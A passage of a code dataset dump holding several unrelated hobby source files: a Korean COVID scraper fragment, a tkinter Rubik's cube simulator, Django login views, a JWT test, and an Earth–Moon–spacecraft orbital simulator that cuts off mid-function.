범위\r\ncol_tag = table_head.find_all(\"th\")\r\n\r\n# 테이블 컬럼 이름을 저장할 리스트 생성\r\ncol_name = []\r\n\r\n# 컬럼명을 리스트에 append\r\nfor th in range(3,11):\r\n col_name.append(col_tag[th].text)\r\n\r\n\r\n\r\n# 도시명 태그 범위\r\ncity_tag = table_body.find_all(\"th\")\r\n\r\n# 도시명만 저장할 리스트 생성 -> 울산[7]\r\ncity_name = []\r\n\r\n# 울산시에 대한 도시명을 리스트에 append\r\ncity_name.append(city_tag[7].text)\r\n\r\n\r\n\r\n# 확진자 수 태그 범위\r\nnumber_tag = table_body.find_all(\"td\")\r\n\r\n# 울산시 확진자 관련 정보 저장할 리스트 생성\r\nulsan_daily = []\r\n\r\n# 울산시에 대한 확진자 수 정보를 리스트에 append\r\nfor td in range(56,64):\r\n ulsan_daily.append(number_tag[td].text)\r\n\r\n\r\n\r\n# 리스트 출력\r\nprint(timeinfo)\r\nprint(city_name)\r\nprint(col_name)\r\nprint(ulsan_daily)","repo_name":"jesamkim/python-covid-info-crawling","sub_path":"ulsan_covid19_daily.py","file_name":"ulsan_covid19_daily.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73740443300","text":"# Rubicks cube simulator engine #\r\n# Created by Alpacah #\r\n# 27/11/2016 #\r\n\r\nfrom tkinter import *\r\nfrom random import randrange\r\n\r\ndef drawCube():\r\n global cube\r\n drawFace(120, 90, 0)\r\n drawFace(120, 25, 1)\r\n drawFace(185, 90, 2)\r\n drawFace(120, 155, 3)\r\n drawFace(55, 90, 4)\r\n drawFace(250, 90, 5)\r\n\r\ndef drawFace(startX, startY, face):\r\n global cube\r\n colors = [\"#FFFFFF\", \"#FF6600\", \"#0000FF\", \"#FF0000\", \"#00FF00\", \"#BBBB00\"]\r\n for part in range(9):\r\n if (part == 3 or part == 6):\r\n startX -= 60\r\n startY += 20\r\n cubeCanvas.create_rectangle(startX + part * 20, startY, startX + part * 20 + 20, startY + 20, fill=colors[cube[face][part]], width=2)\r\n\r\ndef moveFace(moveFace):\r\n global cube\r\n colors = [\"#FFFFFF\", \"#FF5800\", \"#0051BA\", \"#C41E3A\", \"#009E60\", \"#FFD500\"]\r\n isReverse = []\r\n # adjacent in clockaround order [face, part0, part1, part2]\r\n adjacents = [[[1, 6, 7, 8], [2, 0, 3, 6], [3, 2, 1, 0], [4, 8, 5, 2]], #fix\r\n [[5, 2, 1, 0], [2, 2, 1, 0], [0, 2, 1, 0], [4, 2, 1, 0]], #fix\r\n [[1, 8, 5, 2], [5, 0, 3, 6], [3, 8, 5, 2], [0, 8, 5, 2]], #fix\r\n [[0, 6, 7, 8], [2, 6, 7, 8], [5, 6, 7, 8], [4, 6, 7, 8]], #fix\r\n [[1, 0, 3, 6], [0, 0, 3, 6], [3, 0, 3, 6], [5, 8, 5, 2]], #fix\r\n [[1, 2, 1, 0], [4, 0, 3, 6], [3, 6, 7, 8], [2, 8, 5, 2]]] #fix\r\n moveList = [2, 5, 8, 1, 4, 7, 0, 3, 6] # defines witch part goes where on the moved face\r\n # save variables; can't simply save the cube array even with list()\r\n savedFace = []\r\n for i in range(9):\r\n savedFace.append(cube[moveFace][i])\r\n savedLine = [\"\", cube[adjacents[moveFace][0][0]][adjacents[moveFace][0][1]], cube[adjacents[moveFace][0][0]][adjacents[moveFace][0][2]], cube[adjacents[moveFace][0][0]][adjacents[moveFace][0][3]]]\r\n\r\n #move parts in face\r\n for i in range(9):\r\n cube[moveFace][i] = savedFace[moveList[i]]\r\n\r\n #move around faces\r\n for layer in range(4):\r\n for part in range(1, 4):\r\n if (layer < 3):\r\n cube[adjacents[moveFace][layer][0]][adjacents[moveFace][layer][part]] = cube[adjacents[moveFace][layer+1][0]][adjacents[moveFace][layer+1][part]]\r\n else:\r\n cube[adjacents[moveFace][layer][0]][adjacents[moveFace][layer][part]] = savedLine[part] \r\n\r\ndef makeMove(move):\r\n moves = [[\"U\", 0, 3],[\"U'\", 0, 1],[\"R\", 2, 3],[\"R'\", 2, 1],[\"L\", 4, 3],[\"L'\", 4, 1],[\"D\", 5, 3],[\"D'\", 5, 1],[\"B\", 1, 3],[\"B'\", 1, 1],[\"F\", 3, 3],[\"F'\", 3, 1]]\r\n # find ressource id\r\n identifier = 0\r\n for i in range(12):\r\n if (moves[i][0] == move):\r\n identifier = i\r\n\r\n # calculate position\r\n for i in range(moves[identifier][2]):\r\n moveFace(moves[identifier][1])\r\n drawCube()\r\n\r\ndef executeCommand(command):\r\n # read sequence\r\n command = command.replace(\" \", \"\").replace(\"²\", \"2\").replace(\"\\n\", \"\").replace(\"\\r\", \"\")\r\n commands = []\r\n i = 0\r\n while i < len(command):\r\n action = command[i]\r\n if (i < len(command) - 1):\r\n if (command[i+1] == \"'\"):\r\n action = action + \"'\"\r\n i += 1\r\n elif (command[i+1] == \"2\"):\r\n commands.append(action)\r\n i += 1\r\n\r\n commands.append(action)\r\n i += 1\r\n print(commands)\r\n\r\n #play sequence\r\n for i in range(len(commands)):\r\n makeMove(commands[i])\r\n\r\ndef shuffle():\r\n commands = [\"U\", \"U'\", \"L\", \"L'\", \"R\", \"R'\", \"D\", \"D'\", \"B\", \"B'\", \"F\", \"F'\"]\r\n moves = 20\r\n chain = \"\"\r\n for i in range(moves):\r\n chain = chain + commands[randrange(12)]\r\n print(\"suffle command: \" + chain)\r\n executeCommand(chain)\r\n \r\ndef solve():\r\n global cube\r\n cube = [[0, 0, 0, 0, 0, 0, 0, 0, 0], # white\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1], # orange\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2], # blue\r\n [3, 3, 3, 3, 3, 3, 3, 3, 3], # red\r\n [4, 4, 4, 4, 4, 4, 4, 4, 4], # green\r\n [5, 5, 5, 5, 5, 5, 5, 5, 5]] # yellow\r\n drawCube()\r\n\r\n# 1\r\n# 4 0 2 5\r\n# 3\r\n \r\ncube = [[0, 0, 0, 0, 0, 0, 0, 0, 0], # white\r\n [1, 1, 1, 1, 1, 1, 1, 1, 1], # orange\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2], # blue\r\n [3, 3, 3, 3, 3, 3, 3, 3, 3], # red\r\n [4, 4, 4, 4, 4, 4, 4, 4, 4], # green\r\n [5, 5, 5, 5, 5, 5, 5, 5, 5]] # yellow\r\n\r\nroot = Tk()\r\n\r\ncubeCanvas = Canvas(root, width=360, height=240)\r\ncubeCanvas.grid(row=0, column=0)\r\ndrawCube()\r\n\r\nframe = Frame(root)\r\nframe.grid(row=0, column=1)\r\n\r\nButton0 = Button(frame, text=\"U\", command=lambda: makeMove(\"U\"))\r\nButton0.grid(row=1, column=1)\r\nButton1 = Button(frame, text=\"B\", command=lambda: makeMove(\"B\"))\r\nButton1.grid(row=0, column=1)\r\nButton2 = Button(frame, text=\"R\", command=lambda: makeMove(\"R\"))\r\nButton2.grid(row=1, column=2)\r\nButton3 = Button(frame, text=\"F\", command=lambda: makeMove(\"F\"))\r\nButton3.grid(row=2, column=1)\r\nButton4 = Button(frame, text=\"L\", command=lambda: makeMove(\"L\"))\r\nButton4.grid(row=1, column=0)\r\nButton5 = Button(frame, text=\"D\", command=lambda: makeMove(\"D\"))\r\nButton5.grid(row=1, column=3)\r\n\r\nLabel(frame, text=\"Reverse\").grid(row=3, column=1)\r\n\r\nButton0 = Button(frame, text=\"U'\", command=lambda: makeMove(\"U'\"))\r\nButton0.grid(row=5, column=1)\r\nButton1 = Button(frame, text=\"B'\", command=lambda: makeMove(\"B'\"))\r\nButton1.grid(row=4, column=1)\r\nButton2 = Button(frame, text=\"R'\", command=lambda: makeMove(\"R'\"))\r\nButton2.grid(row=5, column=2)\r\nButton3 = Button(frame, text=\"F'\", command=lambda: makeMove(\"F'\"))\r\nButton3.grid(row=6, column=1)\r\nButton4 = Button(frame, text=\"L'\", command=lambda: makeMove(\"L'\"))\r\nButton4.grid(row=5, column=0)\r\nButton5 = Button(frame, text=\"D'\", command=lambda: makeMove(\"D'\"))\r\nButton5.grid(row=5, column=3)\r\n\r\ncommandPrompt = Entry(root)\r\ncommandPrompt.grid(row=1, column=0)\r\n\r\ncommandButton = Button(root, text=\"Execute command\", command=lambda: executeCommand(commandPrompt.get()))\r\ncommandButton.grid(row=1, column=1)\r\nresetButton = Button(root, text=\"Solve cube\", command=solve)\r\nresetButton.grid(row=1, column=2)\r\nresetButton = Button(root, text=\"Shuffle cube\", command=shuffle)\r\nresetButton.grid(row=2, column=1)\r\n\r\nprint(\"F2 R' B' U R' L F' L F' B D' R B L2\")\r\nroot.mainloop()\r\n","repo_name":"0xbeefed/PythonRubicksCubeEngine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6134855030","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom . models import Usuario\n\n# Create your views here.\ndef inicio(request):\n return render(request, 'inicio.html')\n\ndef acceder(request):\n if request.method == 'GET':\n return render(request, 'acceder.html')\n elif request.method == 'POST':\n usuario = request.POST.get('nombreUsuario').lower()\n contrasena = request.POST.get('contrasena')\n ingreso = Usuario.objects.filter(nombreUsuario = usuario, contrasena = contrasena)\n if len(ingreso) != 0:\n usuario_actual = ingreso[0]\n request.session['nombreUsuario'] = usuario_actual.nombreUsuario\n request.session['idUsuario'] = usuario_actual.id\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\ndef registro(request):\n if request.method == 'GET':\n return render(request, 'registro.html')\n elif request.method == 'POST':\n usuario = request.POST.get('nombreUsuario').lower()\n email = request.POST.get('email')\n contrasena = request.POST.get('contrasena')\n confirmContrasena = request.POST.get('confirmContrasena')\n buscarUsuario = Usuario.objects.filter(nombreUsuario = usuario)\n if len(buscarUsuario) != 0:\n return HttpResponse(1)\n if contrasena == confirmContrasena:\n registro = Usuario(\n nombreUsuario = usuario,\n emailUsuario = email,\n contrasena = contrasena\n )\n registro.save()\n return HttpResponse(2)\n return redirect('acceder')\n else:\n return HttpResponse(0)\n return redirect('registro')\n\ndef menu(request):\n return render(request, 'menu.html')","repo_name":"KevinMartinezMella/MySuperPet","sub_path":"apps/master/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7758600901","text":"from jose import jwt\n\nfrom library_app.security import create_access_token\nfrom library_app.settings import Settings\n\nsettings = Settings()\n\n\ndef test_jwt():\n data = {'test': 'test'}\n token = create_access_token(data)\n\n decoded = jwt.decode(\n token, settings.SECRET_KEY, algorithms=[settings.ALGORITHM]\n )\n\n assert decoded['test'] == data['test']\n assert decoded['exp']\n","repo_name":"ricardo-emanuel01/library_app","sub_path":"tests/test_security.py","file_name":"test_security.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19628758520","text":"\"\"\" AGC Simulation ###\r\n# @author Jae Choi\r\n# 3 Bodies simulation inspired by \r\n# https://github.com/zaman13/Three-Body-Problem-Gravitational-System\r\n\"\"\"\r\n\r\nfrom matplotlib.widgets import Slider, Button, RadioButtons\r\nfrom matplotlib import animation, rc\r\nimport threading as th\r\nimport io\r\nimport serial\r\nimport os\r\nimport pylab as py\r\nimport numpy as np\r\nfrom time import sleep\r\nimport matplotlib\r\nimport string\r\n\r\nmatplotlib.rcParams[\"toolbar\"] = \"None\"\r\n\r\n\r\ndef force_bodies(r_1, r_2, body_1, body_2):\r\n M1 = 0\r\n M2 = 0\r\n F = np.zeros(2)\r\n r = np.zeros(2)\r\n if body_1 == \"earth\" and body_2 == \"commanche\":\r\n M1 = Mc\r\n M2 = Mp\r\n elif body_1 == \"earth\" and body_2 == \"moon\":\r\n M1 = Ml\r\n M2 = Mp\r\n elif body_1 == \"moon\" and body_2 == \"commanche\":\r\n M1 = Mc\r\n M2 = Ml\r\n # Get vector difference between the two bodies\r\n r[0] = r_2[0] - r_1[0]\r\n r[1] = r_2[1] - r_1[1]\r\n # Get magnitude of the force and angle\r\n Fmag = GG * M1 * M2 / (np.linalg.norm(r) + 1e-20) ** 2\r\n theta = np.arctan(np.abs(r[1]) / (np.abs(r[0]) + 1e-20))\r\n F[0] = Fmag * np.cos(theta)\r\n F[1] = Fmag * np.sin(theta)\r\n if r[0] > 0:\r\n F[0] = -F[0]\r\n if r[1] > 0:\r\n F[1] = -F[1]\r\n return F\r\n\r\n\r\n# Force on the body\r\ndef force(r, body, ro, vo):\r\n if body == \"commanche\":\r\n return force_bodies([0, 0], r, \"earth\", \"commanche\") + force_bodies(\r\n ro, r, \"moon\", \"commanche\"\r\n )\r\n if body == \"moon\":\r\n return force_bodies([0, 0], r, \"earth\", \"moon\") - force_bodies(\r\n ro, r, \"moon\", \"commanche\"\r\n )\r\n\r\n\r\n# Acceleration\r\ndef dv_dt(t, r, v, body, ro, vo):\r\n F = force(r, body, ro, vo)\r\n if body == \"commanche\":\r\n a = F / Mc\r\n if body == \"moon\":\r\n a = F / Ml\r\n return a\r\n\r\n\r\n# Differential equation solvers\r\n# ===================================================================\r\ndef RK4Solver(t, r, v, dt, body, ro, vo):\r\n k11 = v\r\n k21 = dv_dt(t, r, v, body, ro, vo)\r\n k12 = v + dt * k21 / 2.0\r\n k22 = dv_dt(t + dt / 2.0, r + dt * k11 / 2.0, v + dt * k21 / 2.0, body, ro, vo)\r\n k13 = v + dt * k22 / 2.0\r\n k23 = dv_dt(t + dt / 2.0, r + dt * k12 / 2.0, v + dt * k22 / 2.0, body, ro, vo)\r\n k14 = v + dt * k23\r\n k24 = dv_dt(t + dt, r + dt * k13, v + dt * k23, body, ro, vo)\r\n\r\n y0 = r + dt * (k11 + 2.0 * k12 + 2.0 * k13 + k14) / 6.0\r\n y1 = v + dt * (k21 + 2.0 * k22 + 2.0 * k23 + k24) / 6.0\r\n z = np.zeros([2, 2])\r\n z = [y0, y1]\r\n return z\r\n\r\n\r\n# =====================================================================\r\n# Constants\r\nMe = 6e24 # Mass of Earth (kg)\r\nMm = 6.4e23 # Mass of Mars (kg)\r\nMj = 1.9e27 # Mass of Jupiter (kg)\r\nMs = 5.7e26 # Mass of Saturn (kg)\r\nMs = 2e30 # Mass of Sun (kg)\r\nMcsm = 14e3 # Mass of Command Service Module (approx 14,000 kg)\r\nMll = 7.347e22 # Mass of Luna (kg)\r\nG = 6.673e-11 # Gravitational Constant\r\nRe = 1.496e11 # 1 AU - Distance from Earth to the Sun\r\nRm = 3.844e5 # 1 AU - Distance from Earth to the Sun\r\n# Setting bodies' mass values\r\nMp = Me\r\nMc = Mcsm\r\nMl = Mll\r\nSS = 10e3\r\n# Normalization parameters\r\nRR = Rm * SS\r\n# RR = Re\r\nMM = Mp\r\nTT = 365 * 24 * 60 * 60.0\r\nFF = (G * MM**2) / RR**2 # Unit force\r\nGG = (MM * G * TT**2) / (RR**3)\r\nMc = Mc / MM # Normalized mass of CSM\r\nMp = Mp / MM # Normalized mass of Planet\r\nMl = Ml / MM # Normalized mass of Moon\r\nSPSCALE = 2**14 # Conversion factor between Single Precision to Floats\r\nSIMAGCSCALE = 10.0 # Normalization factor for between -1 and +1\r\n\r\nt_i = 0 # initial time = 0\r\nt_f = 1200 # final time = ?\r\n\r\nN = 100 * t_f # Max number of points for the array - 100 points per year\r\nt = np.linspace(t_i, t_f, N) # time array from t_i to t_f with N points\r\ndt = t[2] - t[1] # time step (uniform)\r\n\r\n# Initial Conditions\r\nri = [1.0, 0] # initial position of Command Service Module\r\nrm_i = [5.0, 0] # initial position of Moon\r\n# Magnitude of Command Service Module's initial velocity\r\nv_i_abs = np.sqrt(Mp * GG / ri[0])\r\n# Magnitude of Command Service Module's initial velocity\r\nvm_i_abs = np.sqrt(Mp * GG / (rm_i[0]))\r\n\r\nprint(\r\n \"GG: {} FF: {} vi: {} vm_i: {} Mp: {} Ml: {}\".format(\r\n GG, FF, v_i_abs, vm_i_abs, Mp, Ml\r\n )\r\n)\r\n\r\n# Initial velocity vector for Command Service Module - along y.\r\nvi = [0, v_i_abs * 1.0]\r\nvmi = [0, vm_i_abs * 1.0] # Initial velocity vector for Moon\r\n\r\n# Initialization\r\nr = np.zeros([N, 2]) # position vector of Command Service Module\r\nv = np.zeros([N, 2]) # velocity vector of Command Service Module\r\nrm = np.zeros([N, 2]) # position vector of Moon\r\nvm = np.zeros([N, 2]) # velocity vector of Moon\r\n\r\n# Initializing the arrays with initial values.\r\nt[0] = t_i\r\nr[0, :] = ri\r\nv[0, :] = vi\r\nrm[0, :] = rm_i\r\nvm[0, :] = vmi\r\n\r\n# Function for setting up the animation\r\npy.style.use(\"dark_background\")\r\nfig, ax = py.subplots(figsize=(8, 4.5))\r\n\r\npy.subplots_adjust(left=-0.25)\r\nax.axis(\"square\")\r\nax.set_xlim((-7.2, 7.2))\r\nax.set_ylim((-7.2, 7.2))\r\nax.get_xaxis().set_ticks([]) # enable this to hide x axis ticks\r\nax.get_yaxis().set_ticks([]) # enable this to hide y axis ticks\r\n\r\nax.plot(0, 0, \"o\", markersize=9, markerfacecolor=\"#0077BE\", markeredgecolor=\"#d2eeff\")\r\n(line1,) = ax.plot(\r\n [], [], \"o-\", color=\"#FDB813\", markevery=10000, markerfacecolor=\"#FD7813\", lw=2\r\n) # line for CSM\r\n(line2,) = ax.plot(\r\n [],\r\n [],\r\n \"o-\",\r\n color=\"#f2f2f2\",\r\n markersize=8,\r\n markerfacecolor=\"#595959\",\r\n lw=2,\r\n markevery=10000,\r\n) # line for Moon\r\n\r\n# Title and legends\r\nttl = ax.text(-6.2, 6.3, r\"3-Body Problem: Luna, Earth, Spacecraft\", fontweight=\"bold\")\r\n# Orbital bodies legends at the bottom\r\nax.plot(-6, -6.2, \"o\", color=\"#FDB813\", markerfacecolor=\"#FD7813\")\r\nax.text(-5.5, -6.4, \"Apollo Command Module\")\r\nax.plot(2.4, -6.2, \"o\", color=\"#f2f2f2\", markersize=8, markerfacecolor=\"#595959\")\r\nax.text(2.9, -6.4, \"Moon\")\r\nax.plot(\r\n 5, -6.2, \"o\", markersize=9, markerfacecolor=\"#0077BE\", markeredgecolor=\"#d2eeff\"\r\n)\r\nax.text(5.5, -6.4, \"Earth\")\r\npy.title(\"Celestial Mechanics Simulator - 3 Body Problem Solved Using Runge-Kutta 4\\n\")\r\n\r\nspeed_i = 1.5\r\nradius_i = 1\r\ndelta_f = 0.05\r\na_0 = 0.2\r\naxspeed = py.axes([0.70, 0.43, 0.2, 0.03])\r\naxfinalrad = py.axes([0.70, 0.48, 0.2, 0.03])\r\naxtransfer = py.axes([0.70, 0.53, 0.2, 0.03])\r\naxradius = py.axes([0.70, 0.58, 0.2, 0.03])\r\nsspeed = Slider(axspeed, \"Simulation Speed\", 0.0, 2.5, valinit=speed_i, valstep=delta_f)\r\nsfinalrad = Slider(\r\n axfinalrad,\r\n \"Final Orbit Radius\",\r\n 0.1,\r\n 0.5,\r\n valinit=a_0,\r\n valstep=delta_f,\r\n color=\"gray\",\r\n)\r\nstransfrad = Slider(\r\n axtransfer,\r\n \"Transfer Orbit Radius\",\r\n 0.2,\r\n 4.5,\r\n valinit=radius_i,\r\n valstep=delta_f,\r\n color=\"orange\",\r\n)\r\nsradius = Slider(\r\n axradius,\r\n \"Orbit Radius\",\r\n 0.5,\r\n 4.5,\r\n valinit=radius_i,\r\n valstep=delta_f,\r\n color=\"#FDB813\",\r\n)\r\n\r\naxstatus = py.axes([0.60, 0.12, 0.3, 0.2])\r\naxstatus.patch.set_edgecolor(\"white\")\r\naxstatus.set_yticks([])\r\naxstatus.set_xticks([])\r\ntprogl = axstatus.text(0.05, 0.8, r\"$\\bf{Current\\ Program:}$\")\r\ntprog = axstatus.text(0.50, 0.8, r\"01 Lunar Injection\", color=\"coral\")\r\ntconnl = axstatus.text(0.05, 0.63, r\"$\\bf{Connection\\ Status:}$\")\r\ntconn = axstatus.text(0.50, 0.63, r\"Disconnected\", color=\"red\")\r\ntdata0l = axstatus.text(0.05, 0.46, r\"$\\bf{Initial\\ Delta-V:}$\")\r\ntdata0 = axstatus.text(0.50, 0.46, r\"+0.00000\")\r\ntdata1l = axstatus.text(0.05, 0.29, r\"$\\bf{Final\\ Delta-V:}$\")\r\ntdata1 = axstatus.text(0.50, 0.29, r\"+0.00000\")\r\ntdata2l = axstatus.text(0.05, 0.12, r\"$\\bf{Angle\\ of\\ Bodies:}$\")\r\ntdata2 = axstatus.text(0.50, 0.12, r\"+0.00000\")\r\n\r\n# Global variables for setting velocity\r\ndelta_vc1 = 0.0\r\ndelta_vc2 = 0.0\r\ntarget_vc1 = 0.0\r\ntarget_vc2 = 0.0\r\ntarget_vc2l = 0.0\r\ntarget_vc2p = 0.0\r\nacm = 0.0\r\ntarget_r2 = 0.0\r\npast_prog = 0\r\nset_delta_vc1 = False\r\nset_delta_vc2 = False\r\nset_homann_transfer = False\r\nset_lunar_inject_va = False\r\nset_lunar_inject_vb = False\r\nset_lunar_inject = False\r\ncurrent_vc = np.zeros(2)\r\ncurrent_rc = np.zeros(2)\r\ncurrent_rm = np.zeros(2)\r\nindex = 0\r\noffset = 0\r\nreset = False\r\nset_flags = False\r\ndo_lunar_injection = False\r\n\r\n\r\ndef arctan(val):\r\n ret = np.abs(np.arctan(val[1] / val[0] + 1.0e-20))\r\n if val[0] > 0.0 and val[1] > 0.0:\r\n return ret\r\n elif val[0] < 0.0 and val[1] > 0.0:\r\n return np.pi - ret\r\n elif val[0] < 0.0 and val[1] < 0.0:\r\n return np.pi + ret\r\n elif val[0] > 0.0 and val[1] < 0.0:\r\n return 2.0 * np.pi - ret\r\n return ret\r\n\r\n\r\ndef set_vector(mag, arg):\r\n return [mag * np.cos(arg), mag * np.sin(arg)]\r\n\r\n\r\n# Animation function. Reads out the positon coordinates sequentially\r\ndef animate(i):\r\n global set_delta_vc1\r\n global set_delta_vc2\r\n global set_lunar_inject\r\n global set_homann_transfer\r\n global delta_vc2\r\n global index\r\n global offset\r\n global index\r\n global reset\r\n global acm\r\n\r\n index = i\r\n i = i - offset\r\n if reset == True:\r\n reset = False\r\n comanche_trail = 80\r\n moon_trail = 200\r\n current_vc[:] = v[i, :]\r\n current_rc[:] = r[i, :]\r\n current_rm[:] = rm[i, :]\r\n line1.set_data(\r\n r[i : max(1, i - comanche_trail) : -1, 0],\r\n r[i : max(1, i - comanche_trail) : -1, 1],\r\n )\r\n line2.set_data(\r\n rm[i : max(1, i - moon_trail) : -1, 0], rm[i : max(1, i - moon_trail) : -1, 1]\r\n )\r\n # Calculate the next point\r\n [r[i + 1, :], v[i + 1, :]] = RK4Solver(\r\n t[i], r[i, :], v[i, :], dt * sspeed.val, \"commanche\", rm[i, :], vm[i, :]\r\n )\r\n [rm[i + 1, :], vm[i + 1, :]] = RK4Solver(\r\n t[i], rm[i, :], vm[i, :], dt * sspeed.val, \"moon\", r[i, :], v[i, :]\r\n )\r\n theta1 = arctan(r[i])\r\n theta2 = arctan(rm[i])\r\n dr = np.subtract(rm[i], r[i])\r\n if set_homann_transfer and set_delta_vc1:\r\n v[i + 1, :] = v[i, :] + [\r\n target_vc1 * np.cos(theta1 + np.pi / 2),\r\n target_vc1 * np.sin(theta1 + np.pi / 2),\r\n ]\r\n # Fire Delta-V normal to the orbit or straight ahead\r\n # v[i + 1, :] = set_vector(target_vc1, theta1 + np.pi / 2)\r\n set_delta_vc1 = False\r\n set_delta_vc2 = True\r\n acm = acm + theta1\r\n if acm >= 2.0 * np.pi:\r\n acm = acm - 2.0 * np.pi\r\n line1.set_color(\"red\")\r\n print(\"Doing first Hohmann burn: {:.5f} {:.5f}\".format(target_vc1, acm))\r\n elif (\r\n set_lunar_inject\r\n and set_delta_vc1\r\n and theta2 > theta1\r\n and np.isclose(abs(theta2 - theta1), abs(acm), atol=0.05)\r\n ):\r\n print(\"Angle: {:.4f} =?= {:.4f}\", acm, theta2 - theta1)\r\n v[i + 1, :] = [\r\n target_vc1 * np.cos(theta1 + np.pi / 2),\r\n target_vc1 * np.sin(theta1 + np.pi / 2),\r\n ]\r\n set_delta_vc1 = False\r\n set_delta_vc2 = True\r\n line1.set_color(\"red\")\r\n elif (\r\n set_lunar_inject\r\n and set_delta_vc2\r\n and np.isclose(sfinalrad.val, np.linalg.norm(dr), atol=0.01)\r\n ):\r\n theta2 = arctan(np.subtract(rm[i], r[i]))\r\n # delta_vc2 = np.sqrt(Mp * GG / np.linalg.norm(rm[i]))\r\n v[i + 1, :] = [\r\n target_vc2p * np.cos(theta1 + np.pi / 2),\r\n target_vc2p * np.sin(theta1 + np.pi / 2),\r\n ]\r\n # delta_vc2 = np.sqrt(Ml * GG / sfinalrad.val)\r\n v[i + 1, :] += [\r\n target_vc2l * np.cos(theta2 + np.pi / 2),\r\n target_vc2l * np.sin(theta2 + np.pi / 2),\r\n ]\r\n set_lunar_inject = False\r\n set_delta_vc2 = False\r\n line1.set_color(\"#FDB813\")\r\n print(\"Lunar injection\")\r\n elif (\r\n set_homann_transfer\r\n and set_delta_vc2\r\n and np.isclose(theta1, acm, atol=0.01)\r\n # and np.isclose(np.linalg.norm(r[i]), target_r2, atol=0.01)\r\n ):\r\n v[i + 1, :] = v[i, :] + [\r\n target_vc2 * np.cos(theta1 + np.pi / 2),\r\n target_vc2 * np.sin(theta1 + np.pi / 2),\r\n ]\r\n set_delta_vc2 = False\r\n set_homann_transfer = False\r\n print(\"Doing second Hohmann burn: {:.5f} {:.5f}\".format(target_vc2, theta1))\r\n line1.set_color(\"#FDB813\")\r\n tm_yr = \"Elapsed time = {:.2f} units {:.5f} =?= {:.5f}\".format(\r\n t[i] * sspeed.val, theta1, acm\r\n )\r\n ttl.set_text(tm_yr)\r\n return (line1, line2, ttl)\r\n\r\n\r\ndef init():\r\n line1.set_data([], [])\r\n line2.set_data([], [])\r\n ttl.set_text(\"\")\r\n return (line1, line2, ttl)\r\n\r\n\r\n# Call animation function\r\nanim = animation.FuncAnimation(\r\n fig, animate, init_func=init, frames=None, interval=5, blit=True\r\n)\r\n\r\n\r\ndef spplistener():\r\n global target_vc1\r\n global target_vc2\r\n global target_vc2l\r\n global target_vc2p\r\n global acm\r\n global target_r2\r\n global past_prog\r\n global set_delta_vc1\r\n global set_delta_vc2\r\n global set_homann_transfer\r\n global set_lunar_inject_va\r\n global set_lunar_inject_vb\r\n global set_lunar_inject\r\n global current_rc\r\n global current_rm\r\n global btConn\r\n global set_flags\r\n global counter\r\n\r\n print(\"Connection is Sucessful. Attempting to listen\")\r\n counter = 0\r\n while btConn.is_open:\r\n ss = btConn.readline()\r\n if len(ss) < 5:\r\n continue\r\n try:\r\n # Read parameters from the ESP32\r\n str_bytes = ss.decode(\"utf-8\")\r\n str_in = str_bytes.replace(\"\\x00\", \"\")\r\n str_in = str_in.split(\" \")\r\n res_0 = int(str_in[0])\r\n res_1 = int(str_in[1])\r\n res_2 = int(str_in[2])\r\n res_3 = int(str_in[3])\r\n verb = int(str_in[4])\r\n dsky_prog = int(str_in[5])\r\n except:\r\n print(\"Error in decoding\")\r\n continue\r\n # print(\r\n # \"Lunar: {} {} {} {} {}\".format(\r\n # set_lunar_inject,\r\n # set_delta_vc1,\r\n # set_lunar_inject_vb,\r\n # set_lunar_inject_va,\r\n # acm,\r\n # )\r\n # )\r\n # print(\r\n # \"Got: {:.5f} {:.5f} {:.5f} {:.5f}\".format(\r\n # float(res_0) / SPSCALE,\r\n # float(res_1) / SPSCALE,\r\n # float(res_2) / SPSCALE,\r\n # float(res_3) / SPSCALE,\r\n # )\r\n # )\r\n if verb == 39 and set_flags:\r\n\r\n if dsky_prog == 0 and do_lunar_injection == False:\r\n # Escape velocity\r\n target_vc1 = float(res_0) / SPSCALE * SIMAGCSCALE\r\n target_vc2 = 0.0\r\n acm = 0\r\n set_homann_transfer = True\r\n set_delta_vc1 = True\r\n set_flags = False\r\n elif dsky_prog == 1 and do_lunar_injection == False:\r\n # Homann Transfer\r\n target_vc1 = float(res_1 - res_0) / SPSCALE * SIMAGCSCALE\r\n target_vc2 = float(res_2 - res_3) / SPSCALE * SIMAGCSCALE\r\n acm = np.pi\r\n set_homann_transfer = True\r\n set_delta_vc1 = True\r\n set_flags = False\r\n elif dsky_prog == 2 and do_lunar_injection:\r\n if dsky_prog != past_prog:\r\n set_lunar_injection()\r\n # print(\"Read first lunar inject\")\r\n # Lunar Injection Initial Velocity Calculation\r\n target_vc1 = float(res_1) / SPSCALE * SIMAGCSCALE\r\n set_lunar_inject_va = True\r\n elif dsky_prog == 3 and do_lunar_injection:\r\n # print(\"Read second lunar inject\")\r\n if dsky_prog != past_prog:\r\n set_lunar_injection()\r\n # Lunar Injection Final Velocity Calculation\r\n target_vc1 = float(res_1) / SPSCALE * SIMAGCSCALE\r\n target_vc2l = float(res_2) / SPSCALE * SIMAGCSCALE\r\n target_vc2p = float(res_3) / SPSCALE * SIMAGCSCALE\r\n set_lunar_inject_vb = set_lunar_inject_va\r\n # set_lunar_injection()\r\n # set_flags = False\r\n elif dsky_prog == 4 and do_lunar_injection:\r\n counter = counter + 1\r\n if dsky_prog != past_prog:\r\n set_lunar_injection()\r\n if counter > 5:\r\n # print(\"Read final lunar inject\")\r\n # Lunar Injection Angle Calculation\r\n target_vc1 = float(res_1) / SPSCALE * SIMAGCSCALE\r\n target_vc2l = float(res_2) / SPSCALE * SIMAGCSCALE\r\n target_vc2p = float(res_3) / SPSCALE * SIMAGCSCALE\r\n acm = np.pi * float(res_0) / SPSCALE\r\n set_lunar_inject = set_lunar_inject_vb\r\n 